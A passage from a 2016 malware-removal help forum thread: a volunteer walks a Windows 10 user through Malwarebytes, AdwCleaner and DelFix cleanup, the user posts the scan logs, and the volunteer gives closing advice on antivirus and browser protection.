Please download the latest version of Malwarebytes' Anti-Malware from here .

Double Click on the mbam-setup.exe file to install the application.

Do not check on the Trial of Professional version. Make sure a checkmark is placed next to Update Malwarebytes' Anti-Malware and Launch Malwarebytes' Anti-Malware, then click Finish.

If an update is found, it will download and install the latest version.

When the main screen opens, if the database is out of date, you can click on the Fix Now banner or the Update Now link.

Once updated, please select Settings > Detection and Protection. Please ensure that "Scan for Rootkits" is selected and that, under Non-Malware Protection, PUP and PUM are set to "Treat detections as malware".

Once the settings have been configured, select the Dashboard tab to return to the Main screen and select "Scan Now >>" to start the scan.

The scan may take some time to finish, so please be patient.

If any malware is found, you will be presented with a screen like the one below.
[Screenshot of the Malwarebytes detection results screen]

Please make sure that everything is checked, and click Remove Selected.
When the scan is complete, click View detailed log >> to view the results.

The report screen will open.

At the bottom click on Export and select as txt file, save the file to your desktop and click OK.  When the export is complete, select OPEN.

The log file will be opened in your default text file viewer (usually Notepad); select the whole text (Ctrl + A) and copy (Ctrl + c) it to paste here in a reply.


Edited by dbrisendine, 01 November 2016 - 10:35 AM.



#11 brokus4

Posted 03 November 2016 - 05:59 PM

Okay, here is the log from the AdwCleaner

 

# AdwCleaner v6.030 - Logfile created 02/11/2016 at 20:11:15
# Updated on 19/10/2016 by Malwarebytes
# Database : 2016-11-02.1 [Server]
# Operating System : Windows 10 Home  (X64)
# Username : Harold - FAMILY-HP
# Running from : C:\Users\Harold\Desktop\AdwCleaner.exe
# Mode: Clean
# Support : hxxps://www.malwarebytes.com/support



***** [ Services ] *****



***** [ Folders ] *****



***** [ Files ] *****

[-] File deleted: C:\END
[-] File deleted: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\eBay.lnk
[-] File deleted: C:\WINDOWS\Reimage.ini


***** [ DLL ] *****



***** [ WMI ] *****



***** [ Shortcuts ] *****



***** [ Scheduled Tasks ] *****



***** [ Registry ] *****

[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\gamingwonderland.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\myway.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\mywebface.com
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{A43DE495-3D00-47D4-9D2C-303115707939}
[-] Key deleted: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\Software\YahooPartnerToolbar
[#] Key deleted on reboot: HKCU\Software\YahooPartnerToolbar
[-] Key deleted: HKLM\SOFTWARE\Conduit
[#] Key deleted on reboot: [x64] HKCU\Software\YahooPartnerToolbar
[-] Key deleted: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\Software\Microsoft\Internet Explorer\SearchScopes\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4}
[#] Key deleted on reboot: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4}
[#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4}
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\inbox.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\ask.com
[#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\DOMStorage\inbox.com
[#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\ask.com


***** [ Web browsers ] *****



*************************

:: "Tracing" keys deleted
:: Winsock settings cleared

*************************

C:\AdwCleaner\AdwCleaner[C0].txt - [2360 Bytes] - [02/11/2016 20:11:15]
C:\AdwCleaner\AdwCleaner[S0].txt - [2548 Bytes] - [02/11/2016 20:03:05]

########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt - [2506 Bytes] ##########
 

 

And here is the log from Malwarebytes Anti-Malware

 

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 11/3/2016
Scan Time: 4:55 PM
Logfile: Anti-Malware log.txt
Administrator: Yes

Version: 2.2.1.1043
Malware Database: v2016.11.03.14
Rootkit Database: v2016.10.31.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 10
CPU: x64
File System: NTFS
User: Harold

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 452772
Time Elapsed: 57 min, 29 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 2
PUP.Optional.Yontoo, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\EVENTLOG\APPLICATION\Update neurowise, Quarantined, [787215a6faa089ad56de8c536e95fb05],
PUP.Optional.Yontoo, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\EVENTLOG\APPLICATION\Util neurowise, Quarantined, [7b6f7d3e49518babfa3ab728a75c1ee2],

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)


(end)



#12 dbrisendine

Posted 04 November 2016 - 02:09 AM

Those look good; mostly inactive, latent settings from past malware / adware.  How is your system running?




#13 brokus4

Posted 04 November 2016 - 05:04 PM

System seems to be running pretty well. I haven't used it much other than to perform the actions you told me to do. I've been waiting for the all clear from you. The performance seems much improved too.

 

So, do you think it's all clear?



#14 dbrisendine

Posted 05 November 2016 - 02:56 AM

All right!! :bananas: Your logs are clean and you're good to go now!! :thumbup2: We've got some final steps left to do to clean up our tools and get your system in good running condition and then you are on your way. I must say though, even though we met through less than ideal circumstances, it has been really great to work with you. :) Just run through the steps from the Cleanup of Tools to the Program Update Checker. That's it. Thanks. :cool:


Clean up of Malware Removal Tools
Now that we are through using these tools, let's clean them off your system so that should you ever need to have malware removed again (we hope not) fresh, updated copies will be downloaded.

  • Download Delfix from here to your desktop and double click it to start the program
  • Ensure Remove disinfection tools is ticked
    Also tick:
  • Activate UAC
  • Create registry backup
  • Purge system restore
  • Reset system settings
  • Click Run
  • The program will run for a few moments and then notepad will open with a log. Please paste the log in your next reply.

You can delete any log files left on your desktop as these are no longer needed.


You are now done! :thumbup2: :grinner: :thumbup2: :grinner: :smilers:

Now some information on programs to help keep you safe:

First, an Antivirus program. You NEED one; free is just as good as paid-for as long as you keep them updated. ONLY use one at a time as having more than that will cause system problems. Here are some free ones to check out:
Microsoft Security Essentials
Avast! Free Antivirus

Next, a firewall is a must-have nowadays. The built-in firewall in Windows 7 (and above) is fine; just make sure it is turned on (Start > Control Panel > Windows Firewall).

=== options ====
Unchecky is a small service that runs in the background to help keep those "extra toolbars" and tag along search engines from automatically installing. By automatically directing you to a custom install with all the options unchecked, only what you manually choose and confirm gets installed.

CryptoPrevent is a free program that prevents CryptoLocker / ransomware from infecting your PC by locking down the OS so the malware can not get a grip on your system. You can read the details about this program here.

Also, consider adding MalwareBytes Antimalware to your arsenal of safe keeping programs. Use the free version (not the paid or trial version) and you won't have a problem with your antivirus scanner program. Keep it updated and run a scan with it once a week.

Lastly, if you use Firefox as your main web browser, consider adding the NoScript and uBlock Origin add-ons to the browser to block scripting hijacks and remove unwanted ads from the pages you view.

You may also find some information and tips at this thread:
How did I get infected in the first place?
and
COMPUTER SECURITY - a short guide to staying safer online

_____________________________________________________________________

Please come back and paste the DelFix.txt log when you can. After that, if you have no more questions, you are good to go. Surf safe, my friend!!
 

 




#15 brokus4

Posted 06 November 2016 - 06:59 AM

Okay, below is the DelFix log file. I really appreciate all of your help and your quick response time! My system seems to be running really well again! YOU ROCK!!!! Thanks so much!!!!

Just one other question. A friend recommended running "Ccleaner" once a week on my system too. Any experience with it? Recommended or not really? Thanks again!!!!

# DelFix v1.010 - Logfile created 06/11/2016 at 06:44:45
# Updated 26/04/2015 by Xplode
# Username : Harold - FAMILY-HP
# Operating System : Windows 10 Home (64 bits)

~ Activating UAC ... OK

~ Removing disinfection tools ...

Deleted : C:\FRST
Deleted : C:\AdwCleaner
Deleted : C:\Users\Harold\Desktop\FRST-OlderVersion
Deleted : C:\log.txt
Deleted : C:\Users\Harold\Desktop\Addition.txt
Deleted : C:\Users\Harold\Desktop\AdwCleaner.exe
Deleted : C:\Users\Harold\Desktop\AdwCleaner[C0].txt
Deleted : C:\Users\Harold\Desktop\Fixlog.txt
Deleted : C:\Users\Harold\Desktop\FRST.txt
Deleted : C:\Users\Harold\Desktop\FRST64.exe
Deleted : C:\Users\Harold\Desktop\Rkill.txt

~ Creating registry backup ... OK

~ Cleaning system restore ...

Deleted : RP #14 [Removed iTunes | 11/05/2016 12:32:51]

New restore point created !

~ Resetting system settings ... OK

########## - EOF - ##########



